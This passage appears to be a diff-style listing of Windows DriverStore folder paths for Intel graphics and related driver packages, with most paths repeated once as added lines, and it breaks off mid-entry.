Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_feb9f1cf05b0de58\ - - Path: c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_0219cc1c7085a93f\ - - Path: c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_df4f60b1cae9b14a\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_16eb18b0e2526e57\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_1c77f1231c19bc72\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_31c60cc38cfcca28\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_82f69cea8b2d928f\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_b4d94f3e41ceb839\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0606619cc97463de\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0e95edab338ad669\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_22aac1442d387216\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2461d914696db722\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_29d727269a34edf5\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2caf76dbce56546d\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_353320edb98da643\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_4ea0ed0af1507894\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_56a48f4f1c2da7a7\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_64f23fdadb76a511\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_668dd0c6d3f9fa0e\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6be8e5b7f731a6e5\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6dad7e4e9a8fa889\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6df442103a1937a4\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_767e7683f9ad126c\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_8644298f665a12c4\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_868acf86149aef5d\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_92cf9d9d84f1d3db\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_93239c65f222d453\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_9de8154b682af864\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_a7428663aca90897\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_ad7cb5e55a410add\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_afbf41cf8ab202d7\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_d193c96475eaa96e\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_db953c52208ada71\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e7523682cc7528cc\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e9f341319ca84274\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f3a64c75ee4defb7\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f51939e52b944f4b\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_4938423c9b9639d7\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_c8e108d4a62c59d5\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_deecec7d232ced2b\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_01ee1299f4982efe\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_02edfc87000937e4\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0541b698fc6e40b0\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0707757077710fff\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0b3e3ed3ace9602a\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0cff362f9dff4228\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_16ed7d82b93e4f68\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1a33d2f73651d989\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1aca2a92a37fce23\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1af2dd3e4df5fd61\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1d571527c7083952\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_23f7302c2b9ee813\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_24de78387e6208e4\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_250db833a1cd577e\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_25e7c5a58c052bc5\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_28d80681d3523b1c\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_2dda3b1147a3a572\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_31ba00ea6900d67d\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_329877a66f240808\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_42af9f4718aa1395\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4645af5c659ae51a\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48c2e68e54c92258\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48e7e903a369eae2\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_491d20003583dabe\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4b34c18659561116\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_51ce968bf19942c2\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_555cfc07a674ecdd\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_561bd21d54545ed3\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_579a75f602cc2dce\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_57f66a4f0a97f1a3\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_587befb80671fb38\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_62f096fe77e085c0\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6ae0ddbb4a38e23c\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6bb02522ea3fdb0d\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6d34ac0763025a06\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_712b6a0adbaabc0a\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_78b09d9681a2400f\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_842874489af34daa\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_88084eb1fe7cebc3\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_89033455cb08186f\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8a9535cd18c90bc3\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8c1fc948b5a01c52\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_9088b61921a6ff9f\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_90f68cd0dc48b625\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_95cb371d046d4b4c\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_a58de0cf5f3e9dca\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_abe9d37302f8b1ae\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_acb3edda7b82982f\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_aebc5a8535dd3184\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b5d4c82c67b39358\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b846bbf1e81ea3cf\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_babb2e8b8072ff3b\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_bc75cebf5edbbc50\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_be91293cf20d4372\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c11f4d5f0bc4c592\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4e5173126d31cf0\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4f600ffe34acc7b\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c8634ed19e331cda\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c9081e50bcffa972\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_ceddadac8a2b489e\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d4406f0ad6ec2581\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d5877a2e0e6374b6\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d8ca5f86add535ef\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_e8abe176c7b553b5\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_eabb3ac2c517211f\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_f8d8be8fea71e1a0\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe5e116bb07c0629\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe73d2ebaa05fb95\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64_kbl_kit127397.inf_amd64_e1da8ee9e92ccadb\ - - Path: c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_364f43f2a27f7bd7\ - - Path: c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_3f3936d8dec668b8\ - - Path: c:\windows\system32\driverstore\filerepository\k127793.inf_amd64_3ab7883eddccbf0f\ - - Path: c:\windows\system32\driverstore\filerepository\ki129523.inf_amd64_32947eecf8f3e231\ - - Path: c:\windows\system32\driverstore\filerepository\ki126950.inf_amd64_fa7f56314967630d\ - - Path: c:\windows\system32\driverstore\filerepository\ki126951.inf_amd64_94804e3918169543\ - - Path: c:\windows\system32\driverstore\filerepository\ki126973.inf_amd64_06dde156632145e3\ - - Path: c:\windows\system32\driverstore\filerepository\ki126974.inf_amd64_9168fc04b8275db9\ - - Path: c:\windows\system32\driverstore\filerepository\ki127005.inf_amd64_753576c4406c1193\ - - Path: c:\windows\system32\driverstore\filerepository\ki127018.inf_amd64_0f67ff47e9e30716\ - - Path: c:\windows\system32\driverstore\filerepository\ki127021.inf_amd64_0d68af55c12c7c17\ - - Path: c:\windows\system32\driverstore\filerepository\ki127171.inf_amd64_368f8c7337214025\ - - Path: c:\windows\system32\driverstore\filerepository\ki127176.inf_amd64_86c658cabfb17c9c\ - - Path: c:\windows\system32\driverstore\filerepository\ki127390.inf_amd64_e1ccb879ece8f084\ - - Path: c:\windows\system32\driverstore\filerepository\ki127678.inf_amd64_8427d3a09f47dfc1\ - - Path: c:\windows\system32\driverstore\filerepository\ki127727.inf_amd64_cf8e31692f82192e\ - - Path: c:\windows\system32\driverstore\filerepository\ki127807.inf_amd64_fc915899816dbc5d\ - - Path: c:\windows\system32\driverstore\filerepository\ki127850.inf_amd64_6ad8d99023b59fd5\ - - Path: c:\windows\system32\driverstore\filerepository\ki128602.inf_amd64_6ff790822fd674ab\ - - Path: c:\windows\system32\driverstore\filerepository\ki128916.inf_amd64_3509e1eb83b83cfb\ - - Path: c:\windows\system32\driverstore\filerepository\ki129407.inf_amd64_f26f36ac54ce3076\ - - Path: c:\windows\system32\driverstore\filerepository\ki129633.inf_amd64_d9b8af875f664a8c\ - - Path: c:\windows\system32\driverstore\filerepository\ki129866.inf_amd64_e7cdca9882c16f55\ - - Path: c:\windows\system32\driverstore\filerepository\ki130274.inf_amd64_bafd2440fa1ffdd6\ - - Path: c:\windows\system32\driverstore\filerepository\ki130350.inf_amd64_696b7c6764071b63\ - - Path: c:\windows\system32\driverstore\filerepository\ki130409.inf_amd64_0d8d61270dfb4560\ - - Path: c:\windows\system32\driverstore\filerepository\ki130471.inf_amd64_26ad6921447aa568\ - - Path: c:\windows\system32\driverstore\filerepository\ki130624.inf_amd64_d85487143eec5e1a\ - - Path: c:\windows\system32\driverstore\filerepository\ki130825.inf_amd64_ee3ba427c553f15f\ - - Path: c:\windows\system32\driverstore\filerepository\ki130871.inf_amd64_382f7c369d4bf777\ - - Path: c:\windows\system32\driverstore\filerepository\ki131064.inf_amd64_5d13f27a9a9843fa\ - - Path: c:\windows\system32\driverstore\filerepository\ki131176.inf_amd64_fb4fe914575fdd15\ - - Path: c:\windows\system32\driverstore\filerepository\ki131191.inf_amd64_d668106cb6f2eae0\ - - Path: c:\windows\system32\driverstore\filerepository\ki131622.inf_amd64_0058d71ace34db73\ - - Path: c:\windows\system32\driverstore\filerepository\ki132032.inf_amd64_f29660d80998e019\ - - Path: c:\windows\system32\driverstore\filerepository\ki132337.inf_amd64_223d6831ffa64ab1\ - - Path: c:\windows\system32\driverstore\filerepository\ki132535.inf_amd64_7875dff189ab2fa2\ - - Path: c:\windows\system32\driverstore\filerepository\ki132544.inf_amd64_b8c1f31373153db4\ - - Path: c:\windows\system32\driverstore\filerepository\ki132574.inf_amd64_54c9b905b975ee55\ - - Path: c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\ - - Path: c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\ +- Path: c:\windows\system32\driverstore\filerepository\64kb6472.inf_amd64_3daef03bbe98572b\ +- Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_0e9c57ae3396e055\ +- Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_209bd95d56b1ac2d\ +- Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_3fa2a843f8b7f16d\ +- Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_85c860f05274baa0\ +- Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_f7412e3e3404de80\ +- Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_feb9f1cf05b0de58\ +- Path: c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_0219cc1c7085a93f\ +- Path: c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_df4f60b1cae9b14a\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_16eb18b0e2526e57\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_1c77f1231c19bc72\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_31c60cc38cfcca28\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_82f69cea8b2d928f\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_b4d94f3e41ceb839\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0606619cc97463de\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0e95edab338ad669\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_22aac1442d387216\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2461d914696db722\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_29d727269a34edf5\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2caf76dbce56546d\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_353320edb98da643\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_4ea0ed0af1507894\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_56a48f4f1c2da7a7\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_64f23fdadb76a511\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_668dd0c6d3f9fa0e\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6be8e5b7f731a6e5\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6dad7e4e9a8fa889\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6df442103a1937a4\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_767e7683f9ad126c\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_8644298f665a12c4\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_868acf86149aef5d\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_92cf9d9d84f1d3db\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_93239c65f222d453\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_9de8154b682af864\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_a7428663aca90897\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_ad7cb5e55a410add\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_afbf41cf8ab202d7\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_d193c96475eaa96e\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_db953c52208ada71\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e7523682cc7528cc\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e9f341319ca84274\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f3a64c75ee4defb7\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f51939e52b944f4b\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_4938423c9b9639d7\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_c8e108d4a62c59d5\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_deecec7d232ced2b\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_01ee1299f4982efe\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_02edfc87000937e4\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0541b698fc6e40b0\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0707757077710fff\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0b3e3ed3ace9602a\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0cff362f9dff4228\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_16ed7d82b93e4f68\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1a33d2f73651d989\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1aca2a92a37fce23\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1af2dd3e4df5fd61\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1d571527c7083952\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_23f7302c2b9ee813\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_24de78387e6208e4\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_250db833a1cd577e\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_25e7c5a58c052bc5\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_28d80681d3523b1c\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_2dda3b1147a3a572\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_31ba00ea6900d67d\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_329877a66f240808\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_42af9f4718aa1395\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4645af5c659ae51a\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48c2e68e54c92258\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48e7e903a369eae2\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_491d20003583dabe\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4b34c18659561116\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_51ce968bf19942c2\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_555cfc07a674ecdd\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_561bd21d54545ed3\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_579a75f602cc2dce\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_57f66a4f0a97f1a3\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_587befb80671fb38\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_62f096fe77e085c0\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6ae0ddbb4a38e23c\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6bb02522ea3fdb0d\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6d34ac0763025a06\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_712b6a0adbaabc0a\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_78b09d9681a2400f\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_842874489af34daa\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_88084eb1fe7cebc3\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_89033455cb08186f\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8a9535cd18c90bc3\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8c1fc948b5a01c52\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_9088b61921a6ff9f\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_90f68cd0dc48b625\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_95cb371d046d4b4c\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_a58de0cf5f3e9dca\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_abe9d37302f8b1ae\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_acb3edda7b82982f\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_aebc5a8535dd3184\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b5d4c82c67b39358\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b846bbf1e81ea3cf\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_babb2e8b8072ff3b\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_bc75cebf5edbbc50\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_be91293cf20d4372\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c11f4d5f0bc4c592\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4e5173126d31cf0\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4f600ffe34acc7b\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c8634ed19e331cda\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c9081e50bcffa972\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_ceddadac8a2b489e\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d4406f0ad6ec2581\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d5877a2e0e6374b6\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d8ca5f86add535ef\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_e8abe176c7b553b5\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_eabb3ac2c517211f\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_f8d8be8fea71e1a0\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe5e116bb07c0629\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe73d2ebaa05fb95\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64_kbl_kit127397.inf_amd64_e1da8ee9e92ccadb\ +- Path: c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_364f43f2a27f7bd7\ +- Path: c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_3f3936d8dec668b8\ +- Path: c:\windows\system32\driverstore\filerepository\k127793.inf_amd64_3ab7883eddccbf0f\ +- Path: c:\windows\system32\driverstore\filerepository\ki129523.inf_amd64_32947eecf8f3e231\ +- Path: c:\windows\system32\driverstore\filerepository\ki126950.inf_amd64_fa7f56314967630d\ +- Path: c:\windows\system32\driverstore\filerepository\ki126951.inf_amd64_94804e3918169543\ +- Path: c:\windows\system32\driverstore\filerepository\ki126973.inf_amd64_06dde156632145e3\ +- Path: c:\windows\system32\driverstore\filerepository\ki126974.inf_amd64_9168fc04b8275db9\ +- Path: c:\windows\system32\driverstore\filerepository\ki127005.inf_amd64_753576c4406c1193\ +- Path: c:\windows\system32\driverstore\filerepository\ki127018.inf_amd64_0f67ff47e9e30716\ +- Path: c:\windows\system32\driverstore\filerepository\ki127021.inf_amd64_0d68af55c12c7c17\ +- Path: c:\windows\system32\driverstore\filerepository\ki127171.inf_amd64_368f8c7337214025\ +- Path: c:\windows\system32\driverstore\filerepository\ki127176.inf_amd64_86c658cabfb17c9c\ +- Path: c:\windows\system32\driverstore\filerepository\ki127390.inf_amd64_e1ccb879ece8f084\ +- Path: c:\windows\system32\driverstore\filerepository\ki127678.inf_amd64_8427d3a09f47dfc1\ +- Path: c:\windows\system32\driverstore\filerepository\ki127727.inf_amd64_cf8e31692f82192e\ +- Path: c:\windows\system32\driverstore\filerepository\ki127807.inf_amd64_fc915899816dbc5d\ +- Path: c:\windows\system32\driverstore\filerepository\ki127850.inf_amd64_6ad8d99023b59fd5\ +- Path: c:\windows\system32\driverstore\filerepository\ki128602.inf_amd64_6ff790822fd674ab\ +- Path: c:\windows\system32\driverstore\filerepository\ki128916.inf_amd64_3509e1eb83b83cfb\ +- Path: c:\windows\system32\driverstore\filerepository\ki129407.inf_amd64_f26f36ac54ce3076\ +- Path: c:\windows\system32\driverstore\filerepository\ki129633.inf_amd64_d9b8af875f664a8c\ +- Path: c:\windows\system32\driverstore\filerepository\ki129866.inf_amd64_e7cdca9882c16f55\ +- Path: c:\windows\system32\driverstore\filerepository\ki130274.inf_amd64_bafd2440fa1ffdd6\ +- Path: c:\windows\system32\driverstore\filerepository\ki130350.inf_amd64_696b7c6764071b63\ +- Path: c:\windows\system32\driverstore\filerepository\ki130409.inf_amd64_0d8d61270dfb4560\ +- Path: c:\windows\system32\driverstore\filerepository\ki130471.inf_amd64_26ad6921447aa568\ +- Path: c:\windows\system32\driverstore\filerepository\ki130624.inf_amd64_d85487143eec5e1a\ +- Path: c:\windows\system32\driverstore\filerepository\ki130825.inf_amd64_ee3ba427c553f15f\ +- Path: c:\windows\system32\driverstore\filerepository\ki130871.inf_amd64_382f7c369d4bf777\ +- Path: c:\windows\system32\driverstore\filerepository\ki131064.inf_amd64_5d13f27a9a9843fa\ +- Path: c:\windows\system32\driverstore\filerepository\ki131176.inf_amd64_fb4fe914575fdd15\ +- Path: c:\windows\system32\driverstore\filerepository\ki131191.inf_amd64_d668106cb6f2eae0\ +- Path: c:\windows\system32\driverstore\filerepository\ki131622.inf_amd64_0058d71ace34db73\ +- Path: c:\windows\system32\driverstore\filerepository\ki132032.inf_amd64_f29660d80998e019\ +- Path: c:\windows\system32\driverstore\filerepository\ki132337.inf_amd64_223d6831ffa64ab1\ +- Path: c:\windows\system32\driverstore\filerepository\ki132535.inf_amd64_7875dff189ab2fa2\ +- Path: c:\windows\system32\driverstore\filerepository\ki132544.inf_amd64_b8c1f31373153db4\ +- Path: 